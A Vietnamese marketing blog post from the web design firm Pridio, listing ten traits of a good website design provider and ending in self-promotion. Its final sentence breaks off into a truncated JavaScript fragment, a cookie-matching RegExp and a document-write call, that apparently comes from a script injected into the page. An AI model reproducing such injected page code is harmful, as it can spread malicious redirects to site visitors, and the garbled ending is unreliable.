Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Kinh doanh > Thế nào là nhà cung cấp dịch vụ thiết kế website tốt

Thế nào là nhà cung cấp dịch vụ thiết kế website tốt

 

Từ năm 2012, khi thương mại điện tử bùng nổ ở Việt Nam kéo theo xu thế mua hàng qua mạng ngày càng thịnh hành . Người dùng giờ đây không cần mất cả buổi đến các cửa hàng, trung tâm thương mại để tìm kiếm , mua một sản phẩm ưng ý. Thay vào đó, dù ngồi ở bất cứ đâu, đang làm việc gì. Chỉ cần một chiếc điện thoại hay máy tính cá nhân có kết nối internet, người ta có thể tìm kiếm và mua bất cứ sản phẩm nào mình muốn. Được so sánh, xem xét giữa các nhãn hàng khác nhau, các nhà cung cấp khác nhau .

Điều này dẫn tới lợi thế vô cùng lớn cho các nhà cung cấp sản phẩm & dịch vụ. Thế giới internet mở ra thị trường rộng lớn và tiềm năng, giảm thiểu tối đa các chi phí và khả năng tiếp cận khách hàng không giới hạn. Giờ đây, với bất cứ ai cũng có thể trở thành những chủ cửa hàng online chỉ với một website chuyên nghiệp hay một fanpage được chăm sóc kỹ lưỡng . Cũng từ đó, các nhà cung cấp giải pháp thiết kế website và marketing mọc lên như nấm ở Việt Nam khắp các tỉnh thành và hình thành một thị trường dịch vụ rộng khắp. Tuy nhiên , với nhiều nhà cung cấp giải pháp đủ loại mức độ giá cả khác nhau như hiện nay, người bán hàng sẽ băn khoăn trước những thắc mắc:

Thế nào là một nhà cung cấp website tốt ?
Thế nào là một website bán hàng hiệu quả ?

Website mức giá như thế nào thì phù hợp ?

Sự khác biệt giữa các loại website ?

Thế nào là website chuẩn SEO? Nó có thực sự “chuẩn” như nhà cung cấp quảng cáo , và nó đem lại lợi ích gì cho người sử dụng?..

Và vô số câu hỏi khác nữa.

website chuan seo

Một thị trường mở rộng cũng đồng nghĩa với việc sẽ xuất hiện  những kẻ trục lợi, lừa đảo hay cung cấp sản phẩm kém chất  lượng. Đó là quy luật cho bất cứ ngành nghề nào. Trong khi  đó khả năng hiểu biết công nghệ thông tin của từng người là  có giới hạn. Vậy làm sao tìm được nhà cung cấp website  chuyên nghiệp với  giá tốt nhất ? Pridio sẽ đưa ra cho các bạn  một số đặc điểm để biết được nhà cung cấp dịch vụ thiết kế  website của mình có tốt hay không trong quá trình chọn lựa

 

1. Nhà cung cấp dịch vụ thiết kế website tốt có lịch sử hình thành lâu năm

Điều này rất quan trọng. Với một nhà cung cấp dịch vụ thiết kế website kém chất lượng, thường sự tồn tại không kéo dài được quá 2 năm. Nếu trên 2,3 năm có nghĩa rằng nhà cung cấp này đã có một lượng khách hàng tốt có thể tự duy trì được. Từ đó chứng tỏ chất lượng của họ không phải là kém.
Mặt khác, việc tồn tại lâu năm sẽ đưa lại cho họ nhiều kinh nghiệm trong việc thiết kế website hay xử lý sự cố khi bạn cần

2. Website tốt khi và chỉ khi có tư vấn tốt

tu van website chuyen nghiep  Đây là điều tất yếu quan trọng khi bạn tiếp xúc với một nhà cung cấp. Sản phẩm của bạn có tốt, phù hợp với công việc của bạn hay không phụ thuộc phần lớn vào người đứng trung gian giữa bạn và công ty. Người tư vấn tốt có được lượng kiến thức đủ nhiều để đưa ra cho bạn giải pháp tốt và hiệu quả nhất chứ không phải chạy theo ý bạn, cũng như có một phong cách làm việc chuyên nghiệp và nhanh nhẹn. Xử lý vấn đề nhanh chóng.
Ngược lại, chỉ cần gặp một nhà tư vấn kém cỏi , ít kinh nghiệm và kiến thức bạn sẽ hoàn toàn biết ngay. Nếu bạn cố làm việc tiếp với nhà cung cấp đó cũng mang lại tỉ lệ sản phẩm cuối cùng kém chất lươngj hay không phù hợp rất cao.

3. Website tốt có giá cả phù hợp với tính năng

thiet ke website gia re

Hiện nay có nhiều mức giá website từ các nhà cung cấp khác nhau. Từ 500 ngàn tới vài chục thậm chí vài trăm triệu. Nhưng rẻ hay đắt bạn phải được chứng minh rõ ràng lý do của nó. Vì dù rất đắt chưa chắc đã tốt, rẻ quá thì lại càng nhiều nguy cơ sản phẩm không được chú trọng, sản phẩm miễn phí hay ăn cắp mã nguồn… Những vấn đề như vậy sẽ đem lại những nguy cơ tiềm ẩn rất cao trong quá trình hoạt động của bạn. Nên nhớ tiền nào của đấy.

4. Nhà cung cấp website chuyên nghiệp luôn sẵn sàng bàn giao mã nguồn

 

ban giao ma nguon website

Với các nhà cung cấp không có trình độ hay muốn khách hàng phụ thuộc vào mình sẽ không muốn bàn giao mã nguồn cho bạn.
Vì nếu bàn giao mã nguồn họ e sợ bạn phát hiện mã nguồn không đúng như những gì họ tuyên bố như là code tối ưu vì có thể đó chỉ là code copy miễn phí. Mặt khác , nếu không được sở hữu mã nguồn, bạn sẽ bị trói với nhà cung cấp đó. Bạn hoàn toàn phụ thuộc vào họ khi có vấn đề hay cần nâng cấp sửa chữa. Đó là cơ sở để họ tăng giá mà bạn buộc phải theo. Cứ nhìn các gian hàng trên alibaba hay 1 số trang thương mại điện tử lớn khác thì rõ. Hàng năm họ đều đặn tăng chi phí và người dùng phụ thuộc buộc phải móc ví trả vì đã lỡ phụ thuộc vào đó để bán hàng mất rồi.

5. Quy trình làm việc rõ ràng

Một công ty thiết kế website chuyên nghiệp luôn có một quy trình làm việc khép kín và rõ ràng , chốt từng bước để tránh tranh cãi.
Quy trình làm việc rõ ràng cũng giúp sản phẩm được hoàn thiện nhanh và chuẩn xác hơn.

6. Dự án đã làm nhiều ngành nghề và không trùng lặp giao diện

Điều này thể hiện nhà cung cấp dịch vụ tự tin với các sản phẩm mình đã làm . Sự sáng tạo là rất tốt cũng như nhiều kinh nghiệm

7. Hiểu và chủ động đưa ra các tư vấn phù hợp

Nhà cung cấp tốt khong chạy theo bạn mà đưa ra cho bạn những tính năng, giải pháp dựa trên việc  tìm hiểu và hỏi rõ để hiểu sản phẩm, ngành nghề của bạn, đối tượng khách hàng và thị phần bán hàng của bạn. Từ đó sẽ thiết kế cho bạn sản phẩm phù hợp nhất.

8. Sẵn sàng hỗ trợ ngoài hợp đồng ngay trong quá trình tìm hiểu

suport online website

Một công ty thiết kế website tốt sẽ cần những khách hàng trung thành, cũng như họ muốn phát triển bền vững. Do vậy , họ sẵn sàng hỗ trợ, cử người tư vấn cho bạn nhiệt tình cho dù bạn chưa có ý định ký kết hợp đồng ngay. Mọi câu hỏi, thắc mắc kể cả ngoài công việc họ vẫn tư vấn và sẵn sàng ngồi với bạn cả buổi để bạn thỏa mãn nhưng câu  hỏi của mình. Nếu tìm được nhà cung cấp như vậy, bạn không ký hợp đồng với họ thì quả là một sai lầm lớn .

9. Hiểu biết về thị trường chung và các công nghệ mới

Điều này bạn có thể kiểm tra để xem nhà cung cấp của mình có cập nhập các xu hướng và công nghệ mới nhất vào trong việc xây dựng sản phẩm cho bạn hay không.
Việc hiểu biết thị trường cũng giúp nhà cung cấp đưa ra phong cách thiết kế website không bị cũ kỹ, lỗi thời

10. Tự tin và chắc chắn ở mọi vấn đề

Khi nào bạn tự tin ở một vấn đề ?

Đó là khi bạn đã trải nghiệm qua điều đó, tự tay làm điều đó thì bạn có thể khẳng định là đúng hay sai , được hay không được. Đó cũng là đặc điểm của bất cứ nhà cung cấp nào. Những kiểu trả lời ớm ờ không chắc chắn thể hiện họ lần đầu làm dự án hoặc tính năng như của bạn. Và như vậy chả có gì đảm bảo họ sẽ làm tốt phần việc đó khi so với các nhà cung cấp đã làm chán kiểu website bạn muốn rồi cả.

Cũng như vậy, Pridio chúng tôi tự tin là nhà cung cấp dịch vụ tư vấn – thiết kế website chuyên nghiệp nhất với giá cả phù hợp nhất cho mọi khách hàng

cong ty thiet ke website pridio

Trên đây chỉ là 1 vài điểm nổi bật cần chú ý khi chọn nhà cung cấp dịch vụ thiết kế website. Bạn có thể đọc thêm các bài viết dưới đây để tìm hiểu rõ hơn về việc nhà cung cấp như thế nào sẽ là tốt nhất cho bạn (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘